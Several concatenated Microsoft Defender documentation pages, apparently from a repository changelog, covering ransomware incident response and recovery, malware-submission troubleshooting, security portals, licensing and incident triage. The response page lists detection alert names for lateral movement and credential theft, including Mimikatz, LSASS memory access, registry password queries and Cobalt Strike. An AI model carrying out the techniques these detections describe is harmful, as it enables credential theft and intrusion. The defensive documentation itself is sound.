-
-* What initially made you aware of the ransomware attack?
- * If IT staff identified the initial threatΓÇösuch as noticing backups being deleted, antivirus alerts, endpoint detection and response (EDR) alerts, or suspicious system changesΓÇöit's often possible to take quick decisive measures to thwart the attack, typically by the containment actions described in this article.
-* What date and time did you first learn of the incident?
- * What system and security updates weren't installed on devices on that date? This is important to understand what vulnerabilities might have been leveraged so they can be addressed on other devices.
- * What user accounts were used on that date?
- * What new user accounts were created since that date?
- * What programs were added to automatically start around the time that the incident occurred?
-* Is there any indication that the attacker is currently accessing systems?
- * Are there any suspected compromised systems that are experiencing unusual activity?
- * Are there any suspected compromised accounts that appear to be actively used by the adversary?
- * Is there any evidence of active command-and-control (C2) servers in EDR, firewall, VPN, web proxy, and other logs?
-
-### Identify the ransomware process
-
-* Using [advanced hunting](advanced-hunting-overview.md), search for the identified process in the process creation events on other devices.
-
-### Look for exposed credentials in the infected devices
-
-* For user accounts whose credentials were potentially compromised, reset the account passwords, and require the users to sign in again.
-* The following IOAs might indicate lateral movement:
-
-<details>
- <summary>Click to expand</summary>
-
-* SuspiciousExploratoryCommands
-* MLFileBasedAlert
-* IfeoDebuggerPersistence
-* SuspiciousRemoteFileDropAndExecution
-* ExploratoryWindowsCommands
-* IoaStickyKeys
-* Mimikatz Defender Amplifier
-* Network scanning tool used by PARINACOTA
-* DefenderServerAlertMSSQLServer
-* SuspiciousLowReputationFileDrop
-* SuspiciousServiceExecution
-* AdminUserAddition
-* MimikatzArtifactsDetector
-* Scuba-WdigestEnabledToAccessCredentials
-* DefenderMalware
-* MLSuspCmdBehavior
-* MLSuspiciousRemoteInvocation
-* SuspiciousRemoteComponentInvocation
-* SuspiciousWmiProcessCreation
-* MLCmdBasedWithRemoting
-* Process Accesses Lsass
-* Suspicious Rundll32 Process Execution
-* BitsAdmin
-* DefenderCobaltStrikeDetection
-* DefenderHacktool
-* IoaSuspPSCommandline
-* Metasploit
-* MLSuspToolBehavior
-* RegistryQueryForPasswords
-* SuspiciousWdavExclusion
-* ASEPRegKey
-* CobaltStrikeExecutionDetection
-* DefenderBackdoor
-* DefenderBehaviorSuspiciousActivity
-* DefenderMalwareExecuted
-* DefenderServerAlertDomainController
-* DupTokenPrivilegeEscalationDetector
-* FakeWindowsBinary
-* IoaMaliciousCmdlets
-* LivingOffTheLandBinary
-* MicrosoftSignedBinaryAbuse
-* MicrosoftSignedBinaryScriptletAbuse
-* MLFileBasedWithRemoting
-* MLSuspSvchostBehavior
-* ReadSensitiveMemory
-* RemoteCodeInjection-IREnabled
-* Scuba-EchoSeenOverPipeOnLocalhost
-* Scuba-SuspiciousWebScriptFileDrop
-* Suspicious DLL registration by odbcconf
-* Suspicious DPAPI Activity
-* Suspicious Exchange Process Execution
-* Suspicious scheduled task launch
-* SuspiciousLdapQueryDetector
-* SuspiciousScheduledTaskRegistration
-* Untrusted application opens a RDP connection
-
-</details>
-
-### Identify the line of business (LOB) apps that are unavailable due to the incident
-
-* Does the app require an identity?
- * How is authentication performed?
- * How are credentials such as certificates or secrets stored and managed?
-* Are evaluated backups of the application, its configuration, and its data available?
-* Determine your compromise recovery process.
-
-## Eradication and recovery
-
-Use these steps to eradicate the threat and recover damaged resources.
-
-### Step 1: Verify your backups
-
-If you have offline backups, you can probably restore the data that has been encrypted after you've removed the ransomware payload (malware) from your environment and after you've verified that there's no unauthorized access in your Microsoft 365 tenant.
-
-### Step 2: Add indicators
-
-Add any known attacker communication channels as indicators, blocked in firewalls, in your proxy servers, and on endpoints.
-
-### Step 3: Reset compromised users
-
-Reset the passwords of any known compromised user accounts and require a new sign-in.
-
-* Consider resetting the passwords for any privileged account with broad administrative authority, such as the members of the Domain Admins group.
-* If a user account might have been created by an attacker, disable the account. Don't delete the account unless there are no plans to perform security forensics for the incident.
-
-### Step 4: Isolate attacker control points
-
-Isolate any known attacker control points inside the enterprise from the Internet.
-
-### Step 5: Remove malware
-
-Remove the malware from the affected devices.
-
-* Run a full, current antivirus scan on all suspected computers and devices to detect and remove the payload that is associated with the ransomware.
-* Don't forget to scan devices that synchronize data or the targets of mapped network drives.
-
-### Step 6: Recover files on a cleaned device
-
-Recover files on a cleaned device.
-
-* You can use [File History](https://support.microsoft.com/help/17128) in Windows 11, Windows 10, Windows 8.1, and System Protection in Windows 7 to attempt to recover your local files and folders.
-
-### Step 7: Recover files in OneDrive for Business
-
-Recover files in OneDrive for Business.
-
-* Files Restore in OneDrive for Business allows you to restore an entire OneDrive to a previous point in time within the last 30 days. For more information, see [Restore your OneDrive](https://support.microsoft.com/office/restore-your-onedrive-fa231298-759d-41cf-bcd0-25ac53eb8a15).
-
-### Step 8: Recover deleted email
-
-Recover deleted email.
-
-* In the rare case that the ransomware deleted all the email in a mailbox, you can recover the deleted items. See [Recover deleted messages in a user's mailbox in Exchange Online](/exchange/recipients-in-exchange-online/manage-user-mailboxes/recover-deleted-messages).
-
-### Step 9: Re-enable Exchange ActiveSync and OneDrive sync
-
-* After you've cleaned your computers and devices and recovered the data, you can re-enable Exchange ActiveSync and OneDrive sync that you previously disabled in step 3 of containment.
security Portal Submission Troubleshooting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/portal-submission-troubleshooting.md
- Title: Troubleshoot Microsoft Security intelligence malware submission errors caused by administrator block
-description: Troubleshoot MSI portal errors
-
-keywords: security, sample submission help, malware file, virus file, trojan file, submit, send to Microsoft, submit a sample, virus, trojan, worm, undetected, doesn't detect, email microsoft, email malware, I think this is malware, I think it's a virus, where can I send a virus, is this a virus, MSE, doesn't detect, no signature, no detection, suspect file, MMPC, Microsoft Malware Protection Center, researchers, analyst, WDSI, security intelligence
-
-ms.sitesec: library
------ m365-security-- tier2- Previously updated : 03/18/2022--
-# Troubleshooting Microsoft Security intelligence malware submission errors caused by administrator block
-
-In some instances, an administrator block might cause submission issues when you try to submit a potentially infected file to the [Microsoft Security intelligence website](https://www.microsoft.com/wdsi) for analysis. The following process shows how to resolve this problem.
-
-## Review your settings
-
-Open your Azure [Enterprise application settings](https://portal.azure.com/#blade/Microsoft_AAD_IAM/StartboardApplicationsMenuBlade/UserSettings/menuId/). Under **Enterprise Applications** > **Users can consent to apps accessing company data on their behalf**, check whether Yes or No is selected.
--- If **No** is selected, a Microsoft Entra administrator for the customer tenant will need to provide consent for the organization. Depending on the configuration with Microsoft Entra ID, users might be able to submit a request right from the same dialog box. If there's no option to ask for admin consent, users need to request for these permissions to be added to their Microsoft Entra admin. Go to the following section for more information.--- If **Yes** is selected, ensure the Windows Defender Security Intelligence app setting **Enabled for users to sign in?** is set to **Yes** [in Azure](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ManagedAppMenuBlade/Properties/appId/f0cf43e5-8a9b-451c-b2d5-7285c785684d/objectId/4a918a14-4069-4108-9b7d-76486212d75d). If **No** is selected, you'll need to request a Microsoft Entra admin enable it.-
-## Implement Required Enterprise Application permissions
-
-This process requires a global or application admin in the tenant.
-
-1. Open [Enterprise Application settings](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ManagedAppMenuBlade/Permissions/appId/f0cf43e5-8a9b-451c-b2d5-7285c785684d/objectId/4a918a14-4069-4108-9b7d-76486212d75d).
-2. Select **Grant admin consent for organization**.
-3. If you're able to do so, review the API permissions required for this application, as the following image shows. Provide consent for the tenant.
-
- ![grant consent image.](../../media/security-intelligence-images/msi-grant-admin-consent.jpg)
-
-4. If the administrator receives an error while attempting to provide consent manually, try either [Option 1](#option-1-approve-enterprise-application-permissions-by-user-request) or [Option 2](#option-2-provide-admin-consent-by-authenticating-the-application-as-an-admin) as possible workarounds.
-
-## Option 1 Approve enterprise application permissions by user request
-
-> [!NOTE]
-> This is currently a preview feature.
-
-Microsoft Entra admins will need to allow for users to request admin consent to apps. Verify the setting is configured to **Yes** in [Enterprise applications](https://portal.azure.com/#blade/Microsoft_AAD_IAM/StartboardApplicationsMenuBlade/UserSettings/menuId/).
-
-![Enterprise applications user settings.](../../media/security-intelligence-images/msi-enterprise-app-user-setting.jpg)
-
-More information is available in [Configure Admin consent workflow](/azure/active-directory/manage-apps/configure-admin-consent-workflow).
-
-Once this setting is verified, users can go through the enterprise customer sign-in at [Microsoft security intelligence](https://www.microsoft.com/wdsi/filesubmission), and submit a request for admin consent, including justification.
-
-![Contoso sign in flow.](../../media/security-intelligence-images/msi-contoso-approval-required.png)
-
-Admin will be able to review and approve the application permissions [Azure admin consent requests](https://portal.azure.com/#blade/Microsoft_AAD_IAM/StartboardApplicationsMenuBlade/AccessRequests/menuId/).
-
-After providing consent, all users in the tenant will be able to use the application.
-
-## Option 2 Provide admin consent by authenticating the application as an admin
-
-This process requires that global admins go through the Enterprise customer sign-in flow at [Microsoft security intelligence](https://www.microsoft.com/wdsi/filesubmission).
-
-![Consent sign in flow.](../../media/security-intelligence-images/msi-microsoft-permission-required.jpg)
-
-Then, admins review the permissions and make sure to select **Consent on behalf of your organization**, and then select **Accept**.
-
-All users in the tenant will now be able to use this application.
-
-## Option 3: Delete and readd app permissions
-
-If neither of these options resolve the issue, try the following steps (as an admin):
-
-1. Remove previous configurations for the application. Go to [Enterprise applications](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ManagedAppMenuBlade/Properties/appId/f0cf43e5-8a9b-451c-b2d5-7285c785684d/objectId/982e94b2-fea9-4d1f-9fca-318cda92f90b)
-and select **delete**.
-
- ![Delete app permissions.](../../media/security-intelligence-images/msi-properties.png)
-
-2. Capture TenantID from [Properties](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/Properties).
-
-3. Replace {tenant-id} with the specific tenant that needs to grant consent to this application in the URL below. Copy this URL into browser. The rest of the parameters are already completed.
-``https://login.microsoftonline.com/{tenant-id}/v2.0/adminconsent?client_id=f0cf43e5-8a9b-451c-b2d5-7285c785684d&state=12345&redirect_uri=https%3a%2f%2fwww.microsoft.com%2fwdsi%2ffilesubmission&scope=openid+profile+email+offline_access``
-
- ![Permissions needed.](../../media/security-intelligence-images/msi-microsoft-permission-requested-your-organization.png)
-
-4. Review the permissions required by the application, and then select **Accept**.
-
-5. Confirm the permissions are applied in the [Azure portal](https://portal.azure.com/#blade/Microsoft_AAD_IAM/ManagedAppMenuBlade/Permissions/appId/f0cf43e5-8a9b-451c-b2d5-7285c785684d/objectId/ce60a464-5fca-4819-8423-bcb46796b051).
-
- ![Review that permissions are applied.](../../media/security-intelligence-images/msi-permissions.jpg)
-
-6. Sign in to [Microsoft security intelligence](https://www.microsoft.com/wdsi/filesubmission) as an enterprise user with a non-admin account to see if you have access.
-
- If the warning is not resolved after following these troubleshooting steps, call Microsoft support.
security Portals https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/portals.md
- Title: Microsoft security portals and admin centers
-description: Find the right Microsoft admin center or portal for managing various services related to Microsoft 365 security.
-
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/03/2024--
-# Microsoft security portals and admin centers
--
-While [Microsoft Defender portal](microsoft-365-defender-portal.md) is the new home for monitoring and managing security across your identities, data, devices, and apps, you need to access various portals for certain specialized tasks.
-
-> [!TIP]
-> To access various relevant portals from Microsoft Defender portal, select **More resources** in the navigation pane.
-
-## Security portals
-
-Security operators and admins can go to the following portals to manage security-specific settings, investigate possible threat activities, respond to active threats, and collaborate with IT admins to remediate issues.
-
-| Portal name | Description | Link |
-||||
-| Microsoft Defender portal | Monitor and respond to threat activity and strengthen security posture across your identities, email, data, endpoints, and apps with [Microsoft Defender XDR](microsoft-365-defender.md) | [security.microsoft.com](https://security.microsoft.com/) <br/><br/>The Microsoft Defender portal is where you view and manage alerts, incidents, settings, and more. |
-| Microsoft Defender Security Center | Monitor and respond to threat activity on your endpoints using capabilities provided with [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint). Most tenants should now be redirected to the Microsoft Defender portal at [security.microsoft.com](https://security.microsoft.com/). | [securitycenter.windows.com](https://securitycenter.windows.com) |
-| Office 365 Security & Compliance Center | Manage [Exchange Online Protection](../office-365-security/eop-about.md) and [Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365) to protect your email and collaboration services, and ensure compliance to various data-handling regulations. Most tenants using the security sections of the Office 365 Security & Compliance Center should now be redirected to the Microsoft Defender portal at [security.microsoft.com](https://security.microsoft.com/). | [protection.office.com](https://protection.office.com) |
-| Defender for Cloud portal | Use [Microsoft Defender for Cloud](/azure/security-center/security-center-intro) to strengthen the security posture of your data centers and your hybrid workloads in the cloud | [portal.azure.com/#blade/Microsoft_Azure_Security](https://portal.azure.com/#blade/Microsoft_Azure_Security/SecurityMenuBlade/0) |
-| Microsoft Defender for Identity portal | Identify, detect, and investigate advanced threats, compromised identities, and malicious insider actions using Active Directory signals with [Microsoft Defender for Identity](/azure-advanced-threat-protection/what-is-atp) | [portal.atp.azure.com](https://portal.atp.azure.com/) |
-| Defender for Cloud Apps portal | Use [Microsoft Defender for Cloud Apps](/cloud-app-security/what-is-cloud-app-security) to get rich visibility, control over data travel, and sophisticated analytics to identify and combat cyberthreats on cloud services | [portal.cloudappsecurity.com](https://portal.cloudappsecurity.com/) |
-| Microsoft Security Intelligence portal | Get security intelligence updates for Microsoft Defender for Endpoint, submit samples, and explore the threat encyclopedia | [microsoft.com/wdsi](https://microsoft.com/wdsi) |
-
-## Portals for other workloads
-
-Although these portals aren't specifically for managing security, they support various workloads and tasks that can impact your security. Visit these portals to manage identities, permissions, device settings, and data handling policies.
-
-| Portal name | Description | Link |
-||||
-| Microsoft Entra admin center | Access and administer the [Microsoft Entra](/entra) family to protect your business with decentralized identity, identity protection, governance, and more, in a multicloud environment | [entra.microsoft.com](https://entra.microsoft.com/) |
-| Azure portal | View and manage all your [Azure resources](/azure/azure-resource-manager/management/overview) | [portal.azure.com](https://portal.azure.com/) |
-| Microsoft Entra admin center | View and manage [Microsoft Entra ID](/azure/active-directory/fundamentals/active-directory-whatis) | [aad.portal.azure.com](https://aad.portal.azure.com/) |
-| Microsoft Purview compliance portal | Manage data handling policies and ensure [compliance with regulations](/compliance/regulatory/offering-home) | [compliance.microsoft.com](https://compliance.microsoft.com/) |
-| Microsoft 365 admin center | Configure Microsoft 365 services; manage roles, licenses, and track updates to your Microsoft 365 services | [admin.microsoft.com](https://go.microsoft.com/fwlink/p/?linkid=2166757) |
-| Microsoft Intune admin center | Use [Microsoft Intune](/mem/intune/fundamentals/what-is-intune) to manage and secure devices. Can also combine Intune and Configuration Manager capabilities. | [endpoint.microsoft.com](https://endpoint.microsoft.com/) |
-| Microsoft Intune portal | Use [Microsoft Intune](/intune/fundamentals/what-is-intune) to deploy device policies and monitor devices for compliance | [endpoint.microsoft.com](https://endpoint.microsoft.com/#blade/Microsoft_Intune_DeviceSettings/DevicesMenu/overview) |
--
security Prerequisites https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/prerequisites.md
- Title: Microsoft Defender XDR prerequisites
-description: Learn about the licensing, hardware and software requirements, and other configuration settings for Microsoft Defender XDR
-
- - NOCSH
------ m365-security-- tier1-
- - MOE150
- - MET150
Previously updated : 12/5/2023--
-# Microsoft Defender XDR prerequisites
---
-**Applies to:**
-- Microsoft Defender XDR-
-Learn about licensing and other requirements for provisioning and using [Microsoft Defender XDR](microsoft-365-defender.md).
-
-## Licensing requirements
-Any of these licenses gives you access to Microsoft Defender XDR features via the Microsoft Defender portal without additional cost:
--- Microsoft 365 E5 or A5-- Microsoft 365 E3 with the Microsoft 365 E5 Security add-on-- Microsoft 365 E3 with the Enterprise Mobility + Security E5 add-on-- Microsoft 365 A3 with the Microsoft 365 A5 Security add-on-- Windows 10 Enterprise E5 or A5-- Windows 11 Enterprise E5 or A5-- Enterprise Mobility + Security (EMS) E5 or A5-- Office 365 E5 or A5-- Microsoft Defender for Endpoint-- Microsoft Defender for Identity-- Microsoft Defender for Cloud Apps or [Cloud App Discovery](/defender-cloud-apps/editions-cloud-app-security-aad)-- Microsoft Defender for Office 365 (Plan 2)-- Microsoft 365 Business Premium-- Microsoft Defender for Business-
-For more information, [view the Microsoft 365 Enterprise service plans](https://www.microsoft.com/licensing/product-licensing/microsoft-365-enterprise).
-
-> Don't have license yet? [Try or buy a Microsoft 365 subscription](../../commerce/try-or-buy-microsoft-365.md)
-
-### Check your existing licenses
-
-Go to Microsoft 365 admin center ([admin.microsoft.com](https://admin.microsoft.com/)) to view your existing licenses. In the admin center, go to **Billing** \> **Licenses**.
-
-> [!NOTE]
-> You need to be assigned either the **Billing admin** or **Global reader** [role in Microsoft Entra ID](/azure/active-directory/roles/permissions-reference) to be able to see license information. If you encounter access problems, contact a global admin.
-
-## Required permissions
-
-You must be a **global administrator** or a **security administrator** in Microsoft Entra ID to turn on Microsoft Defender XDR. For the list of roles required to use Microsoft Defender XDR and information on how access to data is regulated, read about [managing access to Microsoft Defender XDR](m365d-permissions.md).
-
-## Browser requirements
-
-Access Microsoft Defender XDR in the Microsoft Defender portal using Microsoft Edge, Internet Explorer 11, or any HTML 5 compliant web browser.
-
-## Availability to US GCC, GCC High, and other US government institutions
-
-For information related to US Government customers, see [Microsoft Defender XDR for US Government customers](usgov.md).
-
-Currently, the Microsoft Defender for Office 365 integration into the unified Microsoft Defender XDR features are not available to customers in the following Office 365 datacenter locations:
--- Norway-- South Africa-- United Arab Emirates-- Sweden-- Singapore--
-## Related articles
--- [Microsoft Defender XDR overview](microsoft-365-defender.md)-- [Turn on Microsoft Defender XDR](m365d-enable.md)-- [Manage access and permissions](m365d-permissions.md)
security Preview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/preview.md
- Title: Preview features in Microsoft Defender XDR
-description: Learn about new features in Microsoft 365 security
-keywords: preview, new, m365 security, security, 365, capabilities
-search.product: eADQiWindows 10XVcnh
-
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
------ m365-security-- tier1-
- - MOE150
- - MET150
Previously updated : 09/21/2023--
-# Microsoft Defender XDR preview features
--
-**Applies to:**
-- Microsoft Defender XDR-
-The Microsoft Defender XDR service is constantly being updated to include new feature enhancements and capabilities.
-
-Learn about new features in the Microsoft Defender XDR preview release and be among the first to try upcoming features by turning on the preview experience.
-
-For more information on new capabilities that are generally available, see [What's new in Microsoft Defender XDR](whats-new.md).
-
- ## What you need to know
-
-When working with features in public preview, these features:
--- May have restricted or limited functionality. For example, the feature may only apply to one platform.-- Typically go through feature changes before they're generally available (GA).-- Are fully supported by Microsoft.-- May only be available in selected geographic regions or cloud environments. For example, the feature may not exist in the government cloud.-- Individual features in preview may have more usage and support restrictions. If so, this information is typically noted in the feature documentation.-- The preview versions are provided with a standard support level, and can be used for production environments. ---
-## Required permissions
-
-Accounts assigned the following Microsoft Entra roles can turn on Microsoft Defender XDR Preview features:
--- Global administrator-- Security administrator-- Security Operator-
-## Turn on preview features
-
-You'll have access to upcoming features that you can provide feedback on to help improve the overall experience before features are generally available.
-
-Turn on the preview experience setting to be among the first to try upcoming features.
-
-1. In the navigation pane, select **Settings**.
-2. Select **Microsoft Defender XDR**.
-3. Select **Preview features** > **Turn on preview features**.
-4. Select **Save**.
-
-You'll know you have preview features turned on when you see that the **Turn on preview features** check box is selected.
-----
security Reports Xdr https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/reports-xdr.md
- Title: Defender experts for XDR report -
-description: Defender Experts for XDR includes an interactive, on-demand report that provides a clear summary of our expert analysts.
-keywords: XDR, extended detection and response, managed detection and response in defender experts for XDR, Defender xdr reports, XDR report, impacted assets, avergae time to resolve incidents, view incidents, resolved directly
--
-ms.sitesec: library
-ms.pagetype: security
----
- - m365-security
- - tier1
- - essentials-manage
- Previously updated : 02/12/2024--
-# Get real-time visibility with Defender Experts for XDR reports
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)--
-Defender Experts for XDR includes an interactive, on-demand report that provides a clear summary of the work our expert analysts are doing on your behalf, aggregate information about your incident landscape, and granular details about specific incidents. Your service delivery manager (SDM) also uses the report to provide you with more context regarding the service during a monthly business review.
--
-Each section of the report is designed to provide more insights about the incidents our experts investigated and resolved in your environment in real time. You can also select the **Date range** to get detailed information about incidents based on severity, category, and understand the time taken to investigate and resolve an incident during a specific period.
-
-## Understand the Defender Experts for XDR report
-
-The topmost section of the Defender Experts for XDR report provides the percentage of incidents we resolved in your environment, providing you with transparency in our operations. This percentage is derived from the following figures, which are also presented in the report:
--- **Investigated** ΓÇô The number of active threats and other incidents from your incident queue that we triaged, investigated, or currently investigating within our scope.-- **Resolved** ΓÇô The total number of investigated incidents that were closed.-- **Resolved directly** ΓÇô The number of investigated incidents that we were able to close directly on your behalf.-- **Resolved with your help** ΓÇô The number of investigated incidents that were resolved because of your action on one or more managed response tasks.-
-The **Average time to resolve incidents** section displays a bar chart of the average time, in minutes, our experts spent investigating and closing incidents in your environment and the average time you spent performing the required managed response actions.
-
-The **Incidents by severity**, **Incidents by category**, and **Incidents by service source** sections break down resolved incidents by severity, attack technique, and Microsoft security service source, respectively. These sections let you identify potential attack entry points and types of threats detected in your environment, assess their impact, and develop strategies to mitigate and prevent them. Select **View incidents** to get a filtered view of the incident queue based on the selections you made in each of the two sections.
-
-The **Most impacted assets** section shows the users and devices in your environment that were involved in the most number of incidents during your selected date range. You can see the volume of incidents each asset was involved in. Select an asset to get a filtered view of the incident queue based on the incidents that included the said asset.
-
-### See also
--- [Get started with Microsoft Defender Experts for XDR](get-started-xdr.md)-- [Managed detection and response](managed-detection-and-response-xdr.md)-- [Communicating with experts in the Microsoft Defender Experts for XDR service](communicate-defender-experts-xdr.md)-
security Respond First Incident 365 Defender https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/respond-first-incident-365-defender.md
- Title: Responding to your first incident in Microsoft Defender XDR
-description: The basics of responding to your first incident in Microsoft Defender XDR.
-
- - NOCSH
----
- - m365-security
- - m365solution-firstincident
- - highpri
- - tier1
-
- - MOE150
- - MET150
Previously updated : 01/22/2024--
-# Responding to your first incident in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-This guide lists Microsoft resources for new Microsoft Defender XDR users to confidently perform [day-to-day incident response tasks](integrate-microsoft-365-defender-secops-services.md) while using the portal. The intended results of using this guide are:
--- You'll quickly learn to use Microsoft Defender XDR to respond to incidents and alerts.-- You'll discover the portal's features to aid incident investigation and remediation through the videos and tutorials.-
-Microsoft Defender XDR enables you to see relevant threat events across all assets (devices, identities, mailboxes, cloud apps, and more). The portal consolidates signals from the [Defender protection suite](microsoft-365-defender.md#microsoft-defender-xdr-protection), [Microsoft Sentinel](microsoft-365-defender-integration-with-azure-sentinel.md), and other [integrated security information and event management (SIEM) solutions](configure-siem-defender.md). Correlated attack information with full context in a single pane of glass enables you to successfully defend and protect your organization.
-
-This guide has three main sections:
--- Understanding incidents: accessing, triaging, and managing incidents within the portal-- [Analyzing attacks](respond-first-incident-analyze.md): a collection of videos and tutorials on how to investigate specific attacks using the portal's features.-- [Remediating attacks](respond-first-incident-remediate.md): lists the automated and manual actions that are available within the portal to remediate threats. This section includes links to videos and tutorials.-
-## Understanding incidents
-
-An [incident](incidents-overview.md) is a chain of processes created, commands, and actions that might not have coincided. An incident provides a holistic picture and context of suspicious or malicious activity. A single incident gives you an attack's complete context instead of triaging hundreds of alerts from multiple services.
-
-> [!TIP]
-> For a limited time during January 2024, when you visit the **Incidents** page, Defender Boxed appears. Defender Boxed highlights your organization's security successes, improvements, and response actions during 2023. To reopen Defender Boxed, in the Microsoft Defender portal, go to **Incidents**, and then select **Your Defender Boxed**.
-
-Microsoft Defender XDR has many features that you can use to respond to an incident. You can navigate the incidents by selecting **View all incidents** in the Active incidents card on the Home page or through **Incidents & alerts** on the left navigation pane.
-
-*Figure 1. Active incidents card on the Microsoft Defender XDR home page*
-
-*Figure 2. Incident queue*
-
-Each incident contains automatically correlated [alerts](investigate-alerts.md) from [different detection sources](microsoft-365-defender.md#microsoft-defender-xdr-protection) and might involve various endpoints, identities, or cloud apps.
-
-## Incident triage
-
-Incident prioritization varies per responder, security team, and organization. [Incident response plans](/security/operations/incident-response-planning) and security teams' direction can mandate incident priority.
-
-Microsoft Defender XDR has various indicators like incident severity, types of users, or threat types to triage and prioritize incidents. You can use any combination of these indicators readily available through the [incident queue](incident-queue.md) filters.
-
-An example of determining incident priority is combining the following factors for an incident:
--- The incident has a high severity.-- The automation investigation state failed.-- There are 5 impacted assets where two of the assets are tagged with highly confidential data sensitivity.-- The incident status is new.-- The incident is unassigned to any team member for investigation.-
-You might assign a high priority to the incident using the information above. You can begin your incident investigation once a priority is determined.
-
-> [!NOTE]
-> Microsoft Defender XDR automatically determines filters like severity, investigation states, impacted assets, and incident statuses. The information is based on your organization's network activities contextualized with threat intelligence feeds and the automated remediation actions applied.
-
-## Manage incidents
-
-You can contribute to [incident management](manage-incidents.md) efficiency by providing essential information in incidents and alerts. When you add information to the following filters from when you triage and analyze each incident, you provide further context to that incident that other responders can take advantage of:
--- [Classifying incidents and alerts](manage-incidents.md#specify-the-classification)-- Naming incidents-- Adding tags-- Providing comments-
-Learn how to classify incidents and alerts through this video:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4LHJq]
-
-## Next steps
--- [Analyze your first incident](respond-first-incident-analyze.md)-- [Remediate your first incident](respond-first-incident-remediate.md)-- Watch demos and the portal's new developments in action in the [Microsoft Defender XDR Virtual Ninja Training](https://adoption.microsoft.com/en-us/ninja-show/)-
-## See also
--- [Integrate Microsoft Defender XDR into your security operations](integrate-microsoft-365-defender-secops-plan.md)-- [Respond to common attacks using incident response playbooks](/security/operations/incident-response-playbooks)-- Learn the portal's features and functions through the [Microsoft Defender XDR Ninja training](https://techcommunity.microsoft.com/t5/microsoft-365-defender/become-a-microsoft-365-defender-ninja/ba-p/1789376)-
security Respond First Incident Analyze https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/respond-first-incident-analyze.md
- Title: Analyze your first incident in Microsoft Defender XDR
-description: Investigation essentials in analysis of your first incident in Microsoft Defender XDR.
-keywords: incidents, alerts, attack story, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack, incident analysis, threat analysis, threat investigation, incident investigation
-search.product: eADQiWindows 10XVcnh
-
-ms.sitesec: library
-ms.pagetype: security
- - NOCSH
----
- - m365-security
- - m365solution-firstincident
- - highpri
- - tier1
-
- - MOE150
- - MET150
Previously updated : 08/21/2023--
-# Analyze your first incident in Microsoft Defender XDR
--
-**Applies to:**
--- Microsoft Defender XDR-
-Understanding the context that surrounds [incidents](incidents-overview.md) is essential in analyzing attacks. Combining your expertise and experience with Microsoft Defender XDR's features and capabilities ensure faster resolution of incidents and your organization's safety from cyber attacks.
-
-Today's threats on data security - [business email compromise (BEC)](https://www.microsoft.com/security/business/security-101/what-is-business-email-compromise-bec), malware like backdoors and [ransomware](/security/ransomware), organizational breaches, and [nation-state attacks](https://www.microsoft.com/security/business/security-insider/) ΓÇô require quick, intelligent, and decisive action from incident responders. Tools like [Microsoft Defender XDR](microsoft-365-defender.md) allow response teams to detect, triage, and investigate incidents through its single-pane-of-glass experience and find the information needed to make these timely decisions.
-
-## Investigation tasks
-
-Investigations usually involve responders viewing several apps while simultaneously checking various threat intelligence sources. Sometimes investigations are extended to hunting down other threats. Documenting facts and solutions in an attack investigation is an additional important task that provides history and context for other investigators' use or for later investigations. These investigation tasks are simplified when using Microsoft Defender XDR through the following:
--- **Pivoting** – the portal aggregates important attack information contextualized across the Defender workloads enabled in your organization. The portal consolidates all information across a single attack's components (file, URL, mailbox, a user account, or device), showing relationships and timeline of activities. With all the information available in a page, the portal allows incident responders to pivot across related entities and events to find the information they need to make decisions.--- **Hunting** – threat hunters can find known and possible threats within an organization through the portal's [advanced hunting](advanced-hunting-overview.md) capability using Kusto queries. If you're new to Kusto, use the [guided mode](advanced-hunting-modes.md) to hunt for threats.--- **Insight** – where applicable, incident responders can view actions to previously detected event and alerts to aid present investigations. Additional insights are also automatically added to events and alerts through Microsoft's own threat intelligence efforts and from sources like the [MITRE ATT&CK®](https://attack.mitre.org/) framework and [VirusTotal](https://www.virustotal.com/gui/home/upload).--- **Collaboration** – security operations teams can view each team members' decisions and actions on past and present incidents and alerts through portal features like comments, tagging, flagging, and assignment. Further collaboration with Microsoft's managed detection and response service through [Defender Experts for XDR](dex-xdr-overview.md) and [Defender Experts for Hunting](defender-experts-for-hunting.md) are also available when an organization requires an augmented response.-
-## Attack overview
-
-The [attack story](investigate-incidents.md#attack-story) provides incident responders a full, contextualized overview what happened in an attack. Responders can view all related alerts and events, including the automated remediation actions taken by Microsoft Defender XDR to mitigate an attack.
-
-From the attack story, you can dive deeper into the details of an attack by exploring the tabs available on the [incident page](investigate-incidents.md). You can quickly remediate common attacks like phishing, password spray, and malicious app compromise through [incident response playbooks](/security/operations/incident-response-playbooks) accessible within the portal. These playbooks contain detection, response, and mitigation guidance that support incident investigations.
-
-This video of [how to investigate an attack in Microsoft Defender XDR](https://youtu.be/PW_4PWul5MY) and how to use the portal's features in your investigation walks you through the attack story and the incident page.
-
-## Investigating threats
-
-Complex threats like [adversary-in-the-middle attacks](https://www.microsoft.com/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/) and ransomware often require manual investigation. An incident responder tackling these complicated attacks looks for the following crucial information:
--- Presence of malware or suspicious use of tools and apps-- Clues about any communication channels or entry points used by any malicious or suspicious entity-- Clues pointing to possible identity compromise-- Identifying what the impact is on the organization's data and security posture-
